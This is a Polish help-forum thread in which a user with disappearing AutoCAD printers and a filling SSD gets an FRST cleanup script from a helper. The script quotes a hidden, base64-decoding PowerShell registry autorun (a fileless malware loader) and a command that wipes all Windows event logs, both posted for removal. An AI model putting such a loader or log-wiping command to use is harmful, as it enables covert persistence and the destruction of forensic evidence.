• Ogłoszenie:

Znikające drukarki, znikające miejsce na ssd.

Bezpieczeństwo systemów, usuwanie wirusów, dobieranie programów antywirusowych. Obowiązkowe logi w tym dziale: trzy z FRST + Gmer.

Znikające drukarki, znikające miejsce na ssd.

Postprzez mitnickmike 18 Maj 2020, 10:35

reklama
Witam,

Problemy są następujące:

- dysk C (ssd) zaczął zapełniać się niewiadomo dlaczego, bez żądnej ingerencji

- zniknęły mi w AutoCadzie przy opcji wydruku dostępne drukarki, z pozycji Worda czy Notatnika są widoczne, z pozycji Cada drukarek nie widać, podejrzewam że to być może jakieś dziadostwo siedzi i robi psikusa, jeżeli nie to będę ratował się pomocą techniczną AutoDesku jednak chciałbym prosić żeby ktoś kumaty rzucił okiem na ten temat.

- nie mogę zainstalować żadnego oprogramowania antywirusowego typu malwarebytes a miałem je zainstalowane, po prostu przestało działać z dnia na dzień

Log z gmera -> https://megawrzuta.pl/download/39a61784c20d08951a617fee93cf5814.html
Załączniki
gmer problem.JPG
Widok z GMERA, problem z zaznaczeniem wszytkich okienek
4.JPG
To czasami wywala przy włączaniu
3.JPG
Widok dysku C
2 crash sender chomikuj.JPG
To jako drugie
2 crash sender chomikuj.JPG (11.7 KiB) Obejrzany 83521 razy
Powershell przestał działać.JPG
To wyrzuca mi jako pierwsze po włączeniu kompa
Powershell przestał działać.JPG (26.45 KiB) Obejrzany 83521 razy
FRST.txt
(27.77 KiB) Ściągnięto 231 razy
Addition.txt
(54.24 KiB) Ściągnięto 235 razy
mitnickmike
~user
 
Posty: 3
Dołączenie: 18 Maj 2020, 08:31



Znikające drukarki, znikające miejsce na ssd.

Postprzez ordynat 18 Maj 2020, 13:02

Nie widzę tu żadnej infekcji.

Tylko kosmetyka:
Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:
HKU\S-1-5-21-3723520413-3293943760-1221473998-1000\...\Run: [{FC08D491-8A93-4734-BA61-49BE13426009}] => powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AwhUsqAuPIQr').JPiEMuV))); <==== UWAGA
S3 GPU-Z-v2; \??\d:\tmp\GPU-Z-v2.sys [X]
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
S3 MBAMWebAccessControl; \??\C:\Windows\system32\drivers\mwac.sys [X]
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
FirewallRules: [{A7184EB9-6774-49F4-B15B-29ABF699B3E5}] => (Allow) F:\totalcmd\TOTALCMD.EXE => Brak pliku
FirewallRules: [{DD69CCDA-AFE3-4651-8C43-B94F86A13827}] => (Allow) F:\totalcmd\TOTALCMD.EXE => Brak pliku
EmptyTemp:

Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

======================================
Sprawdź usługę "winmgmt" lub napraw WMI.

"winmgmt" to raczej nie jest, bo pokazałoby się to także w innej części logów.
A naprawianie WMI zajęłoby nam kilka lat.
Czarno to widzę.
.

Autor postu otrzymał pochwałę
ordynat
~user
 
Posty: 4765
Dołączenie: 02 Kwi 2010, 11:18
Pochwały: 866



Znikające drukarki, znikające miejsce na ssd.

Postprzez mitnickmike 18 Maj 2020, 14:08

Zrobione.

Czyli tak jak podejrzewałem to program (AutoCad) się wysypał w jakiś magiczny sposób ale pomoc techniczna u nich to tragedia, zero odbierania telefonów, na fb nie odpisują, na maile nie odpowiadają. Nic, będę walczył dalej.

Tak zupełnie przy okazji jakiego antywirusa polecasz? :)

Dzięki ogromne za pomoc.

Dodano Dzisiaj, 15:07:
Te pierwsze okienka z "powershell przestał działać" nadal wyskakują przy uruchamianiu komputera...

Dodano Dzisiaj, 15:36:
Przy próbie aktualizacji comodo (bo okazało się że mam ten antywirus zainstalowany, nie wiedzieć czemu przed wklejeniem w FRST tego co mi kazałeś go nie pokazywało) wywala mi teraz taki błąd. Jest na to jakaś rada?
Załączniki
comodo.JPG
Taki błąd wyrzuca mi teraz przy próbie aktualizacji Commodo.
mitnickmike
~user
 
Posty: 3
Dołączenie: 18 Maj 2020, 08:31



Znikające drukarki, znikające miejsce na ssd.

Postprzez ordynat 18 Maj 2020, 17:43

Do usuwania Comodo służy Uninstaller Tool for Comodo Products https://forums.comodo.com/install-setup-configuration-help-cis/uninstaller-tool-for-comodo-products-t71897.0.html;msg511531#msg511531
ordynat
~user
 
Posty: 4765
Dołączenie: 02 Kwi 2010, 11:18
Pochwały: 866



Znikające drukarki, znikające miejsce na ssd.

Postprzez mitnickmike 18 Maj 2020, 19:43

Ciekawostka...Comodo zapytało czy aplikacja cad jest aplikacją zaufaną i... drukarki wróciły. Jest to możliwe, żeby program nie widział drukarek (w sieci biurowej) bo blokuje je antywirus? Dodam tylko, że są widoczne z poziomu notatnika czy worda. I drugie pytanie jeżeli tak, jest to możliwe, to dlaczego działało to do tej pory bez problemów?
mitnickmike
~user
 
Posty: 3
Dołączenie: 18 Maj 2020, 08:31




Powróć do Bezpieczeństwo

Kto jest na forum

Użytkownicy przeglądający to forum: Brak zarejestrowanych użytkowników oraz 11 gości

cron